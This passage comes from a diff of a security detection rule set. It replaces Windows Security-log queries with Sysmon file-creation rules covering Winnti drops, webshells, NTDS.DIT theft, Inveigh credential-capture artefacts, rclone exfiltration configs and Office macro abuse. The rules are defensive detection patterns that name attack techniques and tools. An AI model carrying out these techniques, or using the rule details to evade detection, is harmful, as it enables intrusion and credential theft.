"Detects files dropped by Winnti as described in RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", - "attack.t1112", - "attack.t1562" + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework' ESCAPE '\\' AND ObjectValueName = 'ETWEnabled' AND NewValue = '0') OR (EventID = '4657' AND ObjectName LIKE '%\\\\Environment%' ESCAPE '\\' AND (ObjectValueName LIKE 'COMPlus\\_ETWEnabled' ESCAPE '\\' OR ObjectValueName LIKE 'COMPlus\\_ETWFlags' ESCAPE '\\') AND NewValue = '0')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" ], - "filename": "win_security_dot_net_etw_tamper.yml" + "filename": "file_event_win_redmimicry_winnti_filedrop.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Security", - "id": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Creation TXT File in User Desktop", + "id": "caf02a0a-1e1c-4552-9b48-5e070bd88d11", + "status": "test", + "description": "Ransomware create txt file in the user Desktop", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1486" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%set%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND (ServiceFileName LIKE '%environment%' ESCAPE '\\' OR ServiceFileName LIKE 
'%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%${input)%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cmd.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.txt' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml" + "filename": "file_event_win_susp_desktop_txt.yml" }, { - "title": "Reconnaissance Activity", - "id": "968eef52-9cff-4454-8992-1e74b9cbad6c", + "title": "UAC Bypass Using NTFS Reparse Point - File", + "id": "7fff6773-2baa-46de-a24a-b6eec1aba2d1", "status": "test", - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "author": "Florian Roth (Nextron Systems), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4661' AND AccessMask = '0x2d' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\') AND ObjectName LIKE 'S-1-5-21-%' ESCAPE '\\' AND (ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-512' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\api-ms-win-core-kernel32-legacy-l1.DLL' ESCAPE '\\')" ], - "filename": 
"win_security_susp_net_recon_activity.yml" + "filename": "file_event_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "First Time Seen Remote Named Pipe", - "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "title": "Suspicious ADSI-Cache Usage By Unknown Tool", + "id": "75bf09fa-1dd7-4d18-9af9-dd9e492562eb", "status": "test", - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "author": "Samir Bousseaden", + "description": "Detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.", + "author": "xknow @xknow_infosec, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1001.003", + "attack.command_and_control" ], "falsepositives": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" + "Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.sch' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\mmc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceSvc.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\')) OR ((Image LIKE 
'C:\\\\Windows\\\\ccmsetup\\\\autoupgrade\\\\ccmsetup%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\SentinelOne\\\\Sentinel Agent%' ESCAPE '\\')) OR (Image LIKE '%\\\\LANDesk\\\\LDCLient\\\\ldapwhoami.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\efsui.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Program Files\\\\Citrix\\\\Receiver StoreFront\\\\Services\\\\DefaultDomainServices\\\\Citrix.DeliveryServices.DomainServices.ServiceHost.exe' ESCAPE '\\')))" ], - "filename": "win_security_lm_namedpipe.yml" + "filename": "file_event_win_susp_adsi_cache_usage.yml" }, { - "title": "Possible PetitPotam Coerce Authentication Attempt", - "id": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "status": "experimental", - "description": "Detect PetitPotam coerced authentication activity.", - "author": "Mauricio Velazco, Michael Haag", + "title": "Suspicious NTDS.DIT Creation", + "id": "4e7050dd-e548-483f-b7d6-527ab4fa784d", + "status": "test", + "description": "Detects suspicious creations of a file named \"ntds.dit\" (Active Directory Database) by suspicious parent process, directory or a suspicious one liner", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1187" + "attack.t1003.003" ], "falsepositives": [ - "Unknown. Feedback welcomed." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*' ESCAPE '\\' AND ShareName LIKE '%\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'lsarpc' AND SubjectUserName = 'ANONYMOUS LOGON')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND ((ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\apache%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\' OR ParentImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_petitpotam_network_share.yml" + "filename": "file_event_win_ntds_dit.yml" }, { - "title": "Persistence and Execution at Scale via GPO Scheduled Task", - "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", - "status": "test", - "description": "Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale", - "author": "Samir Bousseaden", + "title": "Inveigh Execution Artefacts", + "id": "bb09dd3e-2b78-4819-8e35-a7c1b874e449", + "status": "experimental", + "description": "Detects the presence and execution of Inveigh via dropped artefacts", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - 
"attack.persistence", - "attack.lateral_movement", - "attack.t1053.005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\SYSVOL' ESCAPE '\\' AND RelativeTargetName LIKE '%ScheduledTasks.xml' ESCAPE '\\' AND (Accesses LIKE '%WriteData%' ESCAPE '\\' OR Accesses LIKE '%\\%\\%4417%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Inveigh-Log.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Cleartext.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2Users.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv1.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-NTLMv2.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-FormInput.txt' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Inveigh-Relay.ps1' ESCAPE '\\'))" ], - "filename": "win_security_gpo_scheduledtasks.yml" + "filename": "file_event_win_hktl_inveigh_artefacts.yml" }, { - "title": "Hacktool Ruler", - "id": "24549159-ac1b-479c-8175-d42aea947cae", - "status": "test", - "description": "This events that are generated when using the hacktool Ruler by Sensepost", - "author": "Florian Roth (Nextron Systems)", + "title": "File Creation In Suspicious Directory By Msdt.EXE", + "id": "318557a5-150c-4c8d-b70e-a9910e199857", + "status": "experimental", + "description": "Detects msdt.exe creating files in suspicious directories which could be a sign of 
exploitation of either Follina or Dogwalk vulnerabilities", + "author": "Vadim Varganov, Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.execution", - "attack.t1087", - "attack.t1114", - "attack.t1059", - "attack.t1550.002" + "attack.persistence", + "attack.t1547.001", + "cve.2022.30190" ], "falsepositives": [ - "Go utilities that use staaldraad awesome NTLM library" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_alert_ruler.yml" + "filename": "file_event_win_msdt_susp_directories.yml" }, { - "title": "SMB Create Remote File Admin Share", - "id": "b210394c-ba12-4f89-9117-44a2464b9511", + "title": "Windows Webshell Creation", + "id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "status": "test", - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Possible webshell file creation on a static web site", + "author": "Beyu Denis, oscd.community, Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or developer creating legitimate executable files in a web application folder" ], "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '%C$' ESCAPE '\\' AND AccessMask = '0x2') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.asp%' ESCAPE '\\' OR TargetFilename LIKE '%.ashx%' ESCAPE '\\' OR TargetFilename LIKE '%.ph%' ESCAPE '\\')) OR ((TargetFilename LIKE '%\\\\www\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\htdocs\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\html\\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.ph%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (Image = 'System') OR (TargetFilename LIKE '%\\\\xampp%' ESCAPE '\\')))" ], - "filename": "win_security_smb_file_creation_admin_shares.yml" + "filename": "file_event_win_webshell_creation_detect.yml" }, { - "title": "NetNTLM Downgrade Attack", - "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "title": "Rclone Config File Creation", + "id": "34986307-b7f4-49be-92f3-e7a4d01ac5db", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects Rclone config file being created", + "author": "Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate Rclone usage (rare)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 
'RestrictSendingNTLMTraffic'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\.config\\\\rclone\\\\%' ESCAPE '\\')" ], - "filename": "win_security_net_ntlm_downgrade.yml" + "filename": "file_event_win_rclone_exec_file.yml" }, { - "title": "Active Directory Replication from Non Machine Account", - "id": "17d619c1-e020-4347-957e-1d1207455c93", + "title": "Wmiprvse Wbemcomn DLL Hijack - File", + "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", "status": "test", - "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.006" + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" ], - "filename": "win_security_ad_replication_non_machine_account.yml" + "filename": 
"file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - Security", - "id": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "title": "Suspicious Word Cab File Write CVE-2021-40444", + "id": "60c0a111-787a-4e8a-9262-ee485f3ef9d5", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects file creation patterns noticeable during the exploitation of CVE-2021-40444", + "author": "Florian Roth (Nextron Systems), Sittikorn S", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.resource_development", + "attack.t1587" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ServiceFileName LIKE '%value%' ESCAPE '\\' OR ServiceFileName LIKE '%invoke%' ESCAPE '\\' OR ServiceFileName LIKE '%comspec%' ESCAPE '\\' OR ServiceFileName LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\INetCache%' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.inf%' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%AppData\\\\Local\\\\Temp%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Content.inf' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_rundll32_services_security.yml" + "filename": 
"file_event_win_winword_cve_2021_40444.yml" }, { - "title": "WCE wceaux.dll Access", - "id": "1de68c67-af5c-4097-9c85-fe5578e09e67", + "title": "Hijack Legit RDP Session to Move Laterally", + "id": "52753ea4-b3a0-4365-910d-36cff487b789", "status": "test", - "description": "Detects wceaux.dll access while WCE pass-the-hash remote command execution on source host", - "author": "Thomas Patzke", + "description": "Detects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder", + "author": "Samir Bousseaden", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.s0005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4658', '4660', '4663') AND ObjectName LIKE '%\\\\wceaux.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')" ], - "filename": "win_security_mal_wceaux_dll.yml" + "filename": "file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "HybridConnectionManager Service Installation", - "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service installation.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "status": "experimental", + "description": "This rule will monitor executable and script file creation by office applications. 
Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_hybridconnectionmgr_svc_installation.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { 
- "title": "Possible Shadow Credentials Added", - "id": "f598ea0c-c25a-4f72-a219-50c44411c791", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", "status": "experimental", - "description": "Detects possible addition of shadow credentials to an active directory object.", - "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1556" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-KeyCredentialLink')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": 
"win_security_susp_possible_shadow_credentials_added.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "Password Change on Directory Service Restore Mode (DSRM) Account", - "id": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "status": "stable", - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "author": "Thomas Patzke", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", + "status": "experimental", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Initial installation of a domain controller" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4794')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE 